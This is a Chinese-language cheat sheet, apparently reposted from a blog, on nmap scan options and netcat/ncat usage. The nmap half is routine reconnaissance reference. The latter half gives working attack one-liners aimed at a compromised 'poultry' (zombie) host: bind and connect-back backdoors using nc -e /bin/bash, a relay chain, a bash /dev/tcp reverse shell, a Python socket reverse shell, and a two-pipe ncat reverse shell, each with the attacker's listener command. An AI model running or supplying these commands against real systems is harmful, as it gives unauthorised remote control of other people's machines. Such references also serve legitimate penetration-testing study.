namp & ncat
Posted dissipate
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了namp & ncat相关的知识,希望对你有一定的参考价值。
--dns-servers
是复数,主要用于内部架设的dns服务器,外部dns无法解析.
-Pn Treat all hosts as online --- skip host discovery
明确知道主机存活或防火墙开启的机器,-Pn不启用探测前的ICMP请求,达到不触发防火墙的安全机制
-F fast mode scan fewer ports than the default scan 扫描100个最常用的端口
-p -p m-n 指定端口
-p 80,135
-p ssh 只能扫描ssh默认端口22
修改端口后,加-sV选项可识别出修改端口后的服务
-p T:23,U:23-100 nmap默认只扫描tcp端口,tcp 和 udp 一起扫描需同时加 -sT -sU 选项
-p s*
UDP 被fw屏蔽后,会显示open|filtered,但是TCP显示filtered
UDP 只有服务监听于默认端口,才会显示open,监听于非默认端口也显示open|filtered bind例子 ncat监视端口显示closed(ncat无回应)
服务的指纹信息 服务的端口,服务名,版本
-A enable version detection OS detection script scanning traceroute
-T[0-5] set timing template higher is faster -A 耗时很长 -T5大大加速
-sV probe open ports to determine services/version info 实现 version detection 功能
-O os detection
-sn ping scan disable port scan
加-v 显示所有的
不加-v 只显示up的
-sS TCP SYN
-o[AXN] 保存为所有的,xml,文本
-e using specified interface
nmap四大主要功能
1) 主机发现(host discovery)
2) 端口扫描(port scanning)
3) 版本侦测(version detection)
4) OS侦测(operation system detection)
CIDR classless inter-domain routing
脚本相关
nmap -sV --script="version,discovery" target
nmap -sV -T5 -v --script vuln target 探测目标漏洞
nmap --script http-title|http-headers target
nmap -sS -sU -T5 --top-ports 100 ip TCP SYN扫描tcp,同时扫描udp,nmap-services中前100个端口(开放概率排名,nmap默认会扫描概率
最高的1000个端口)
nc
获取banner信息
echo ‘ ‘|nc -nv -w2 ip port_range 不使用z选项 kali中的可用,其他都有问题
扫描端口
nc -nvz -w2 ip port_range 可扫描外网主机
nc -l -w3 -z -v -u -p 987 < preempt.txt
nc -l -p 789 -e cmd
netcat 一切数据通过stdin/stdout实现
监听型后门
nc -l -p 889 -e /bin/bash
nc ip port
连接型后门
nc ip port -e /bin/bash
nc -l -p 889
-z zero I/O mode,userd for scanning 发送的数据报中不包含任何的payload
-s source address
-w seconds timeout
连接转发
relay host:
#!/bin/env bash
nc ip1(poultry) port1
nc -l -p port2 -e relay.sh
hacker:
nc ip(relay host) port2
poultry:
nc -l -p port1 -e /bin/bash
netcat反弹shell(bash)
bash -i >& /dev/tcp/ip(hacker)/port(hacker监听的port) 0>&1
hacker:
ncat -lvp port
python反弹shell
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘ip‘,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([‘/bin/bash‘,‘-i‘]);"
hacker:
ncat -lvp port
ncat反弹shell(不支持 -e)
poultry:
nc ip port|/bin/bash|nc ip port+1
hacker:
开启两个terminal,
nc -lvp port 输入命令
nc -lvp port+1 显示结果
以上是关于namp & ncat的主要内容,如果未能解决你的问题,请参考以下文章
[Hack The Box]靶机6 Legacy && 靶机7 Blue
[Hack The Box]靶机6 Legacy && 靶机7 Blue